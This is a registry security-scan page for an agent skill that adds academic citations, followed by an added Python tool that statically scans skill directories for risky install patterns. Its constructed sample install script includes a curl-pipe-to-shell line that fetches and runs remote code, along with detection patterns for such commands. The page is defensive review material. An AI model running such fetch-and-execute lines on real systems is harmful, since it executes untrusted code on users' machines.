Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Auto-add references to articles

v1.0.0

Automatically adds references to academic articles. Parses the article content to extract topics and keywords, calls academic-search to retrieve related papers, recommends candidate references for the user to confirm, and automatically inserts formatted citations. Supports Markdown/LaTeX/Word input and outputs BibTeX, GB/T 7714 and APA formats. Triggered when the user says "help me add references", "find refe...

License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
VirusTotal: Suspicious
OpenClaw: Suspicious (medium confidence)
Purpose & Capability
The skill's name and description (auto-add citations) match the included scripts (parse, format, insert). However, the registry metadata declares no runtime dependencies or environment variables, while SKILL.md and README instruct the user to git-clone a separate academic-search skill and to pip-install Python packages (python-docx, textract). Leaving those required dependencies out of the metadata is an inconsistency and reduces transparency.
Instruction Scope
SKILL.md instructs running local Python scripts that read and overwrite user documents (backups are made), which is consistent with the stated purpose. It also instructs cloning and invoking an external academic-search skill for retrieval; that external component performs network access and search actions (arXiv, Semantic Scholar, Google Scholar, CNKI). The skill's instructions do not attempt to read credentials or unrelated system files, but they do write to ~/.cursor/skills/academic-search (per the clone command) and to document directories (.bib files, backups), so users should expect both filesystem and network activity.
Install Mechanism
No formal install spec is provided in the registry, yet SKILL.md and README direct the user to run git clone for academic-search and pip install python-docx textract. Pulling an external GitHub repository and installing textract (which can require native dependencies) are non-trivial installs. The skill neither declares nor pins versions and relies on a third-party repository (ustc-ai4science/academic-search) whose check-deps.sh should be inspected; this is a higher-risk install pattern than a purely instruction-only skill.
Credentials
No sensitive environment variables or credentials are declared as required. SKILL.md and README mention optional env vars for styling (AUTO_CITATION_STYLE, YEAR_RANGE, CANDIDATES), which are harmless. However, the academic-search dependency (not declared in the metadata) may itself require API keys or browser automation to reach Google Scholar or CNKI; those requirements are not surfaced here and should be checked in that dependency's docs and check-deps.sh.
Persistence & Privilege
The skill does not request 'always: true' and does not modify other skills or global agent settings. It creates and modifies files in the user's document directories and creates backups; that is appropriate for an insertion tool and matches the stated behavior.
What to consider before installing
This skill's code implements parsing, formatting, and insertion of citations and aligns with its description, but before installing you should:
1. Inspect the academic-search repository referenced in SKILL.md (especially scripts/check-deps.sh). It may install browser automation or require API keys for Google Scholar, CNKI or other platforms.
2. Be aware the README asks you to git-clone repositories into ~/.cursor/skills and to pip-install python-docx and textract (textract often needs native libraries); ensure you trust those sources and run installs in a controlled environment.
3. Review the Python scripts yourself (they read and overwrite documents and create backups) and test on non-sensitive sample files.
4. If you need to avoid network scraping or extra credentials, ask the author how academic-search will authenticate and whether it can be restricted to only the arXiv and Semantic Scholar APIs.
5. The registry metadata does not list the runtime dependencies. Ask the publisher to update the metadata to include required packages and any external credentials so you can make a fully informed decision.
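Points 1 and 3 (read check-deps.sh, read the Python scripts) can be partly mechanised before anything in the clone is executed. The script below is an added example, not code from this skill, from academic-search, or from the ClawHub scanner: it walks a skill directory, parses each .py file with the standard `ast` module and scans each .sh file line by line, and reports the behaviours the report above says to look for (network imports, shell execution, eval/exec, file writes, unpinned pip installs, git clones, curl-pipe-shell, sudo). The module lists, finding categories, the sample skill it scans (including the example.invalid URLs) and the file names are constructed for the demo and are my own choices.

```python
"""Pre-install static triage of an agent skill directory (added example).

Not the skill's code and not ClawHub's scanner. Walks a skill directory,
parses .py files with `ast` and scans .sh files line by line, and lists the
places a reviewer should read before running anything. The sample skill
written by scan_sample_skill() is constructed for the demo.
"""
from __future__ import annotations

import ast
import re
import tempfile
from pathlib import Path

# Module and call lists are assumptions for the demo, not an exhaustive policy.
NETWORK_MODULES = {"requests", "urllib", "urllib3", "http", "socket",
                   "httpx", "aiohttp", "selenium", "playwright"}
PROCESS_MODULES = {"subprocess", "os", "shutil", "pty"}
DYNAMIC_CODE = {"eval", "exec", "compile", "__import__"}
SHELL_EXEC = {"os.system", "os.popen", "subprocess.run", "subprocess.Popen",
              "subprocess.call", "subprocess.check_call", "subprocess.check_output"}
WRITE_MODE = re.compile(r"[wax+]")  # any open() mode that can modify a file

# Patterns a reviewer would flag in check-deps.sh or any install script.
SHELL_PATTERNS = [
    ("curl-pipe-shell", re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba)?sh\b")),
    ("sudo", re.compile(r"\bsudo\b")),
    ("unpinned-pip", re.compile(r"\bpip3?\s+install\b(?!.*==)")),
    ("git-clone", re.compile(r"\bgit\s+clone\b")),
    ("dotfile-write", re.compile(r">\s*~/\.")),  # redirect into a dotfile/dir
]


def _finding(path: Path, line: int, kind: str, detail: str) -> dict:
    return {"file": path.name, "line": line, "kind": kind, "detail": detail}


def _call_name(node: ast.Call) -> str:
    """Dotted name of a call target: 'subprocess.run', 'open', 'f.write'."""
    func, parts = node.func, []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    return ".".join(reversed(parts))


def _open_mode(node: ast.Call):
    """Literal mode given to open(), positionally or as mode=; None if absent."""
    if len(node.args) > 1 and isinstance(node.args[1], ast.Constant):
        return node.args[1].value
    for kw in node.keywords:
        if kw.arg == "mode" and isinstance(kw.value, ast.Constant):
            return kw.value.value
    return None


def scan_python(path: Path) -> list[dict]:
    findings, tree = [], ast.parse(path.read_text(encoding="utf-8"), filename=str(path))
    for node in ast.walk(tree):
        mods = []
        if isinstance(node, ast.Import):
            mods = [a.name for a in node.names]
        elif isinstance(node, ast.ImportFrom):
            mods = [node.module or ""]
        elif isinstance(node, ast.Call):
            name, kind, detail = _call_name(node), None, ""
            if name in DYNAMIC_CODE:
                kind, detail = "dynamic-code", name
            elif name in SHELL_EXEC:
                kind, detail = "shell-exec", name
            elif name == "open":
                mode = _open_mode(node)
                if isinstance(mode, str) and WRITE_MODE.search(mode):
                    kind, detail = "file-write", f"open(mode={mode!r})"
            if kind:
                findings.append(_finding(path, node.lineno, kind, detail))
        for mod in mods:  # top-level package decides the category
            root = mod.split(".")[0]
            if root in NETWORK_MODULES:
                findings.append(_finding(path, node.lineno, "network-import", mod))
            elif root in PROCESS_MODULES:
                findings.append(_finding(path, node.lineno, "process-import", mod))
    return findings


def scan_shell(path: Path) -> list[dict]:
    findings = []
    for lineno, line in enumerate(path.read_text(encoding="utf-8").splitlines(), 1):
        code = line.split("#", 1)[0]  # drop trailing comments and the shebang
        for kind, pattern in SHELL_PATTERNS:
            if pattern.search(code):
                findings.append(_finding(path, lineno, kind, code.strip()))
    return findings


def scan_skill(root: Path) -> list[dict]:
    findings = []
    for path in sorted(root.rglob("*")):
        if path.suffix == ".py":
            findings.extend(scan_python(path))
        elif path.suffix == ".sh":
            findings.extend(scan_shell(path))
    return findings


# Constructed sample skill: a backup-then-overwrite script plus an install script.
SAMPLE_PY = """\
import shutil
import requests

def insert(doc):
    shutil.copy(doc, doc + ".bak")   # backup, then overwrite in place
    with open(doc, "w") as f:
        f.write("...")
"""
SAMPLE_SH = """\
#!/bin/sh
pip install python-docx textract
git clone https://example.invalid/academic-search ~/.cursor/skills/academic-search
curl -fsSL https://example.invalid/setup.sh | sh
"""


def scan_sample_skill() -> list[dict]:
    """Write the constructed sample skill to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        scripts = Path(tmp) / "scripts"
        scripts.mkdir()
        (scripts / "insert_citations.py").write_text(SAMPLE_PY, encoding="utf-8")
        (scripts / "check-deps.sh").write_text(SAMPLE_SH, encoding="utf-8")
        return scan_skill(Path(tmp))


if __name__ == "__main__":
    for f in scan_sample_skill():
        print(f"{f['file']}:{f['line']}: {f['kind']}: {f['detail']}")
```

Run it against the cloned directory (for example ~/.cursor/skills/academic-search) after git clone and before executing check-deps.sh or any pip install. A hit marks a place to read, not proof of malice: in the sample, the file-write on the document is exactly the backup-then-overwrite behaviour the report says to expect, while the unpinned pip install and the curl-pipe-shell line are the install steps that should make you stop and ask the author the questions in points 1, 4 and 5.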

Like a lobster shell, security has layers — review code before you run it.

latest: vk973q7pzq6z9qtgkqd0yqwr6cx84n402

